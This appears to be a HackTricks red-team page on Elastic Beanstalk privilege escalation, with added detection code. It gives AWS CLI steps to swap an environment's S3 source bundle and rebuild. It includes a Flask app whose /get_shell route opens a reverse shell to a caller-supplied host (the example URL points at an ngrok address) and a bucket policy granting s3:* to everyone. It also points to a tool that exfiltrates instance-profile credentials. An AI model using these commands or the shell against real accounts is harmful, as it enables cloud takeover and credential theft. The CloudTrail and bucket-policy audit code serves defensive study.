AWS - Elastic Beanstalk Privesc

Reading time: 6 minutes

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Elastic Beanstalk

More information about Elastic Beanstalk in:

AWS - Elastic Beanstalk Enum

warning

To perform sensitive actions in Beanstalk you will need a lot of sensitive permissions across many different services. As a reference, check the permissions granted by arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk

elasticbeanstalk:RebuildEnvironment, S3 write permissions & many others

With write permissions over the S3 bucket that holds the environment's code, plus permissions to rebuild the application (elasticbeanstalk:RebuildEnvironment is required, together with a couple more related to S3, EC2 and CloudFormation), you can modify the code and rebuild the application; the next time the application is accessed it will execute the new code, allowing an attacker to compromise the application and the credentials of its IAM role.

```bash
# Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip <files to zip>
# Upload code
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name"
```
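From the defender's side, the sequence above leaves a recognisable trail in CloudTrail: an S3 write into an `elasticbeanstalk-<region>-<accountId>` bucket followed shortly afterwards by `RebuildEnvironment` (or `UpdateEnvironment`) from the same principal. The following detection is an added example and not HackTricks' own code; the CloudTrail-shaped records, the `ci-deploy-role` ARN, the `low-priv-user` name and the timestamps are constructed for the example, and the bucket/key names reuse the ones shown on this page.

```python
"""Detect the "write source bundle, then rebuild" path in CloudTrail records.

Added example (not code from HackTricks). It correlates S3 write events on an
elasticbeanstalk-<region>-<account> bucket with a later RebuildEnvironment or
UpdateEnvironment call by the same principal inside a time window. Records
below are constructed dicts using CloudTrail field names; ARNs are made up.
"""
from datetime import datetime, timedelta
import re

# Naming pattern Elastic Beanstalk uses for the buckets holding source bundles.
EB_BUCKET = re.compile(r"^elasticbeanstalk-[a-z0-9-]+-\d{12}$")
S3_WRITE_EVENTS = {"PutObject", "CopyObject", "CompleteMultipartUpload", "DeleteObject"}
EB_DEPLOY_EVENTS = {"RebuildEnvironment", "UpdateEnvironment"}


def _when(record):
    return datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def find_code_swap_then_deploy(records, window=timedelta(hours=1), trusted_principals=()):
    """Return one finding per deploy call that follows a bucket write by the same
    principal within `window`. Principals in `trusted_principals` (e.g. the CI/CD
    deployment role that legitimately does exactly this) are skipped."""
    writes = []  # (time, principal ARN, bucket, key)
    for r in records:
        params = r.get("requestParameters") or {}
        if (r["eventSource"] == "s3.amazonaws.com"
                and r["eventName"] in S3_WRITE_EVENTS
                and EB_BUCKET.match(params.get("bucketName", ""))):
            writes.append((_when(r), r["userIdentity"]["arn"],
                           params["bucketName"], params.get("key", "")))

    findings = []
    for r in records:
        if (r["eventSource"] != "elasticbeanstalk.amazonaws.com"
                or r["eventName"] not in EB_DEPLOY_EVENTS):
            continue
        principal = r["userIdentity"]["arn"]
        if principal in trusted_principals:
            continue
        t = _when(r)
        env = (r.get("requestParameters") or {}).get("environmentName", "?")
        for wt, wp, bucket, key in writes:
            if wp == principal and timedelta(0) <= t - wt <= window:
                findings.append({
                    "principal": principal, "bucket": bucket, "key": key,
                    "deploy_event": r["eventName"], "environment": env,
                    "minutes_between": int((t - wt).total_seconds() // 60),
                })
    return findings


# Constructed sample records: a normal CI deployment, then the abuse pattern.
SAMPLE_RECORDS = [
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutObject",
     "userIdentity": {"arn": "arn:aws:sts::947247140022:assumed-role/ci-deploy-role/codepipeline"},
     "requestParameters": {"bucketName": "elasticbeanstalk-eu-west-1-947247140022",
                           "key": "release-42.zip"}},
    {"eventTime": "2024-05-01T10:02:00Z", "eventSource": "elasticbeanstalk.amazonaws.com",
     "eventName": "UpdateEnvironment",
     "userIdentity": {"arn": "arn:aws:sts::947247140022:assumed-role/ci-deploy-role/codepipeline"},
     "requestParameters": {"environmentName": "prod-env", "versionLabel": "release-42"}},
    {"eventTime": "2024-05-01T11:30:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutObject",
     "userIdentity": {"arn": "arn:aws:iam::947247140022:user/low-priv-user"},
     "requestParameters": {"bucketName": "elasticbeanstalk-eu-west-1-947247140022",
                           "key": "1692777270420-aws-flask-app.zip"}},
    {"eventTime": "2024-05-01T11:41:00Z", "eventSource": "elasticbeanstalk.amazonaws.com",
     "eventName": "RebuildEnvironment",
     "userIdentity": {"arn": "arn:aws:iam::947247140022:user/low-priv-user"},
     "requestParameters": {"environmentName": "env-name"}},
    {"eventTime": "2024-05-01T11:45:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "GetObject",  # reads are not part of the pattern
     "userIdentity": {"arn": "arn:aws:iam::947247140022:user/low-priv-user"},
     "requestParameters": {"bucketName": "elasticbeanstalk-eu-west-1-947247140022",
                           "key": "1692777270420-aws-flask-app.zip"}},
]

TRUSTED = ("arn:aws:sts::947247140022:assumed-role/ci-deploy-role/codepipeline",)

if __name__ == "__main__":
    for finding in find_code_swap_then_deploy(SAMPLE_RECORDS, trusted_principals=TRUSTED):
        print(finding)
```

Without the allowlist the CI role's own deploy is reported too, which is the expected noise for this rule; the useful signal is a deploy by a principal that does not normally ship code, or any write to the source bundle bucket that does not come from the deployment pipeline at all.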

elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole, and more...

The permissions above, together with several S3, EC2, CloudFormation, Auto Scaling and Elastic Load Balancing permissions, are what is needed to create a bare Elastic Beanstalk scenario from scratch.

  • Create an AWS Elastic Beanstalk application:
```bash
aws elasticbeanstalk create-application --application-name MyApp
```
  • Create an AWS Elastic Beanstalk environment:
```bash
aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role
```

If the environment already exists and you don't want to create a new one, you can simply update the existing one.

  • Package your application code and dependencies into a ZIP file:
```bash
zip -r MyApp.zip .
```
  • Upload the ZIP file to an S3 bucket:
```bash
aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip
```
  • Create an AWS Elastic Beanstalk application version:
```bash
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"
```
  • Deploy the application version to your AWS Elastic Beanstalk environment:
```bash
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
```

elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, cloudformation:GetTemplate, cloudformation:DescribeStackResources, cloudformation:DescribeStackResource, autoscaling:DescribeAutoScalingGroups, autoscaling:SuspendProcesses

First of all you need to create a legitimate Beanstalk environment with the code you want to run in the victim, following the previous steps. It can be a simple zip containing these 2 files:

```python
from flask import Flask, request, jsonify
import subprocess, os, socket

application = Flask(__name__)

@application.errorhandler(404)
def page_not_found(e):
    return jsonify('404')

@application.route("/")
def index():
    return jsonify('Welcome!')


@application.route("/get_shell")
def search():
    host = request.args.get('host')
    port = request.args.get('port')
    if host and port:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        p = subprocess.call(["/bin/sh", "-i"])
    return jsonify('done')

if __name__ == "__main__":
    application.run()
```

Once your own Beanstalk environment is running the rev shell, it's time to migrate it to the victim environment. To do so you need to update the Bucket Policy of your Beanstalk S3 bucket so the victim can access it (note that this opens the Bucket to EVERYONE):

```json
{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": [
        "s3:ListBucket",
        "s3:ListBucketVersions",
        "s3:GetObject",
        "s3:GetObjectVersion",
        "s3:*"
      ],
      "Resource": [
        "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
        "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
      ]
    },
    {
      "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
      "Effect": "Deny",
      "Principal": {
        "AWS": "*"
      },
      "Action": "s3:DeleteBucket",
      "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
    }
  ]
}
```
```bash
# Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"

# This step needs the extra permissions (deploy the version label created above)
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-2.0

# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528
```
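Two things in this cross-account hop are checkable by a defender: the bucket policy that grants `Allow` to the wildcard principal, and a `CreateApplicationVersion` source bundle whose bucket name encodes an account id other than the deploying account. The code below is an added example, not HackTricks' own; the policy embedded in it is the one shown above, and the `111111111111` "deploying account" id is a constructed value.

```python
"""Review a Beanstalk bucket policy and the ownership of a source bundle bucket.

Added example (not code from HackTricks). Check 1 reports Allow statements
whose principal is "*" and that carry no Condition; a Deny to "*" (as in the
second statement of the page's policy) is normal and is not reported. Check 2
parses elasticbeanstalk-<region>-<account> and tells whether the bucket belongs
to the account that is deploying the application version.
"""
import json
import re

EB_BUCKET = re.compile(r"^elasticbeanstalk-(?P<region>[a-z0-9-]+)-(?P<account>\d{12})$")


def _is_anyone(principal):
    """True for both spellings of the wildcard principal: "*" and {"AWS": "*"}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def public_allow_statements(policy):
    """Return the unconditional Allow-to-anyone statements of a bucket policy
    (JSON string or dict), each with its Sid, actions and whether s3:* is granted."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    found = []
    for i, st in enumerate(policy.get("Statement", [])):
        if st.get("Effect") != "Allow" or not _is_anyone(st.get("Principal")):
            continue
        if st.get("Condition"):
            continue  # scoped by e.g. aws:SourceAccount; needs a separate review
        actions = st.get("Action", [])
        actions = [actions] if isinstance(actions, str) else list(actions)
        found.append({
            "sid": st.get("Sid", f"statement[{i}]"),
            "actions": actions,
            "wildcard_action": any(a in ("s3:*", "*") for a in actions),
        })
    return found


def source_bundle_owner(bucket_name):
    """Return (region, account) parsed from an elasticbeanstalk-* bucket name, else None."""
    m = EB_BUCKET.match(bucket_name)
    return (m.group("region"), m.group("account")) if m else None


def source_bundle_is_foreign(bucket_name, deploying_account):
    """True when the source bundle bucket is another account's Beanstalk bucket,
    i.e. the version being deployed was not staged by the deploying account."""
    owner = source_bundle_owner(bucket_name)
    return owner is not None and owner[1] != deploying_account


# The bucket policy shown on this page (Allow to "*" plus a Deny on s3:DeleteBucket).
SAMPLE_POLICY = json.dumps({
    "Version": "2008-10-17",
    "Statement": [
        {"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", "Effect": "Allow",
         "Principal": {"AWS": "*"},
         "Action": ["s3:ListBucket", "s3:ListBucketVersions", "s3:GetObject",
                    "s3:GetObjectVersion", "s3:*"],
         "Resource": ["arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
                      "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"]},
        {"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", "Effect": "Deny",
         "Principal": {"AWS": "*"}, "Action": "s3:DeleteBucket",
         "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"},
    ],
})

if __name__ == "__main__":
    for st in public_allow_statements(SAMPLE_POLICY):
        print("public Allow:", st)
    # 111111111111 is a constructed id standing in for the deploying account.
    print("foreign bundle:", source_bundle_is_foreign(
        "elasticbeanstalk-us-east-1-947247140022", "111111111111"))
```

Both checks are cheap enough to run as a periodic audit over `get-bucket-policy` output and over the `SourceBundle` of each application version; S3 Block Public Access on the Beanstalk buckets stops the first half of this hop outright, and a deploying account that only accepts source bundles from its own `elasticbeanstalk-<region>-<accountId>` bucket stops the second.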

Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).

The developer intends to add reverse shell support via Netcat or Socat as a next step, keeping exploitation contained to the EC2 instance to avoid detection.
